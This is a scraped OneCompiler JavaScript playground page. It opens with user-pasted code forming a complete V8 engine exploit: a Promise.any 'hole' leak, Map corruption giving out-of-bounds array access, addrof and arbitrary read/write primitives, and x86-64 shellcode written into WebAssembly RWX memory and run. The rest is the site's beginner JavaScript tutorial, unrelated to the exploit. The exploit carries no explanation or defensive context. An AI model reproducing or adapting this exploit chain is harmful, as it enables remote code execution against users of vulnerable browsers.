console.log("Hello, World!");
let wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
// shellcoode /bin/bash
// const shellcode = new Uint8Array([0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52,0x66, 0x68, 0x2d, 0x63, 0x54, 0x5e, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69,0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x56, 0x57, 0x54, 0x5e, 0x6a, 0x3b, 0x58, 0x0f,0x05]);
// shellcode calculator
const shellcode = new Uint8Array([0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e,
0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48,
0x89, 0xe6, 0x52, 0xe8, 0x1c, 0x00, 0x00, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41,
0x59, 0x3d, 0x3a, 0x30, 0x20, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c,
0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f,
0x05]);
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u32 = new Uint32Array(buf);
const bigUint64 = new BigUint64Array(buf);
f2i = (val) => {
f64[0] = val;
return bigUint64[0];
}
i2f = (val) => {
bigUint64[0] = val;
return f64[0];
}
d2u = (v) => {
f64[0] = v;
return Array.from(u32);
}
u2d = (lo, hi) => {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
ByteToBigIntArray = (payload) => {
let sc = []
let tmp = 0n;
let lenInt = BigInt(Math.floor(payload.length / 8))
for (let i = 0n; i < lenInt; i += 1n) {
tmp = 0n;
for (let j = 0n; j < 8n; j++) {
tmp += BigInt(payload[i * 8n + j]) * (0x1n << (8n * j));
}
sc.push(tmp);
}
let len = payload.length % 8;
tmp = 0n;
for (let i = 0n; i < len; i++) {
tmp += BigInt(payload[lenInt * 8n + i]) * (0x1n << (8n * i));
}
sc.push(tmp);
return sc;
}
function trigger() {
let v1;
function f0(v4) {
v4(() => { }, v5 => {
v1 = v5.errors;
});
}
f0.resolve = function (v6) {
return v6;
};
let v3 = {
then(v7, v8) {
v8();
}
};
Promise.any.call(f0, [v3]);
return v1[1];
}
let hole = trigger();
var map = new Map();
map.set('kiprey', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("kiprey");
print(map.size);
map.set(0x18, "kiprey");
var nop = new Array(1);
var oobArray = [];
oobArray.push(1.1);
var objArray = {
"tag": 0xdead,
"leak": 0x1234,
};
bigUintArray = new BigUint64Array(6);
bigUintArray[0] = 0x1234n;
bigUintArray[1] = 0x5678n;
map.set("1", "kiprey");
addrof = (obj) => {
objArray.leak = obj;
for (let i = 0; i < 0x3000; i++) {
let half = d2u(oobArray[i]);
if (half[0] == (0xdead << 1)) {
ret = half[1];
break;
} else if (half[1] == (0xdead << 1)) {
ret = d2u(oobArray[i + 1])[0];
break;
}
}
return BigInt(ret);
}
let base_offset;
let external_offset;
let big_len_offset;
for (let i = 0; i < 0x3000; i++) {
if (f2i(oobArray[i]) == 0x1234) {
base_offset = i + 12;
external_offset = i + 11;
big_len_offset = i + 10;
break;
}
}
let base_ptr = f2i(oobArray[base_offset]);
let external_ptr = f2i(oobArray[external_offset]);
let big_len = f2i(oobArray[big_len_offset]);
arb_r = (addr) => {
oobArray[base_offset] = i2f(addr - 0x8n);
let ret = bigUintArray[0];
return ret;
}
arb_w = (addr, payload) => {
let sc = ByteToBigIntArray(payload);
oobArray[big_len_offset] = i2f(BigInt(sc.length));
oobArray[base_offset] = i2f(0n);
oobArray[external_offset] = i2f(addr);
for (let i = 0; i < sc.length; i += 1) {
bigUintArray[i] = sc[i];
}
}
let rwx_mem = arb_r(addrof(wasm_instance) + 0x60n);
print(rwx_mem.toString(16));
arb_w(rwx_mem, shellcode);
f(); Write, Run & Share Javascript code online using OneCompiler's JS online compiler for free. It's one of the robust, feature-rich online compilers for Javascript language. Getting started with the OneCompiler's Javascript editor is easy and fast. The editor shows sample boilerplate code when you choose language as Javascript and start coding.
Javascript(JS) is a object-oriented programming language which adhere to ECMA Script Standards. Javascript is required to design the behaviour of the web pages.
var readline = require('readline');
var rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
terminal: false
});
rl.on('line', function(line){
console.log("Hello, " + line);
});
| Keyword | Description | Scope |
|---|---|---|
| var | Var is used to declare variables(old way of declaring variables) | Function or global scope |
| let | let is also used to declare variables(new way) | Global or block Scope |
| const | const is used to declare const values. Once the value is assigned, it can not be modified | Global or block Scope |
let greetings = `Hello ${name}`
const msg = `
hello
world!
`
An array is a collection of items or values.
let arrayName = [value1, value2,..etc];
// or
let arrayName = new Array("value1","value2",..etc);
let mobiles = ["iPhone", "Samsung", "Pixel"];
// accessing an array
console.log(mobiles[0]);
// changing an array element
mobiles[3] = "Nokia";
Arrow Functions helps developers to write code in concise way, it’s introduced in ES6.
Arrow functions can be written in multiple ways. Below are couple of ways to use arrow function but it can be written in many other ways as well.
() => expression
const numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
const squaresOfEvenNumbers = numbers.filter(ele => ele % 2 == 0)
.map(ele => ele ** 2);
console.log(squaresOfEvenNumbers);
let [firstName, lastName] = ['Foo', 'Bar']
let {firstName, lastName} = {
firstName: 'Foo',
lastName: 'Bar'
}
const {
title,
firstName,
lastName,
...rest
} = record;
//Object spread
const post = {
...options,
type: "new"
}
//array spread
const users = [
...adminUsers,
...normalUsers
]
function greetings({ name = 'Foo' } = {}) { //Defaulting name to Foo
console.log(`Hello ${name}!`);
}
greet() // Hello Foo
greet({ name: 'Bar' }) // Hi Bar
IF is used to execute a block of code based on a condition.
if(condition){
// code
}
Else part is used to execute the block of code when the condition fails.
if(condition){
// code
} else {
// code
}
Switch is used to replace nested If-Else statements.
switch(condition){
case 'value1' :
//code
[break;]
case 'value2' :
//code
[break;]
.......
default :
//code
[break;]
}
For loop is used to iterate a set of statements based on a condition.
for(Initialization; Condition; Increment/decrement){
//code
}
While is also used to iterate a set of statements based on a condition. Usually while is preferred when number of iterations are not known in advance.
while (condition) {
// code
}
Do-while is also used to iterate a set of statements based on a condition. It is mostly used when you need to execute the statements atleast once.
do {
// code
} while (condition);
ES6 introduced classes along with OOPS concepts in JS. Class is similar to a function which you can think like kind of template which will get called when ever you initialize class.
class className {
constructor() { ... } //Mandatory Class method
method1() { ... }
method2() { ... }
...
}
class Mobile {
constructor(model) {
this.name = model;
}
}
mbl = new Mobile("iPhone");